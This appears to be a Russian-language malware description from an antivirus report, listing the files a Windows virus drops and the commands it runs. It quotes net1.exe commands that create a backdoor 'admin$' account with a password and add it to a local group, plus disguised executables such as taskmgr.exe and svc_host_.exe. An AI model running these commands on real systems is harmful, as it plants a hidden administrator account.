Техническая информация
- '%WINDIR%\Temp\taskmgr.exe' 52 0 "<Полный путь к вирусу>"
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s admin$ /add
- '<SYSTEM32>\net1.exe' user admin$ wjb18198@@! /add
- <SYSTEM32>\GroupPolicy\Machine\Scripts\svc_host_.exe
- %WINDIR%\Temp\taskmgr.exe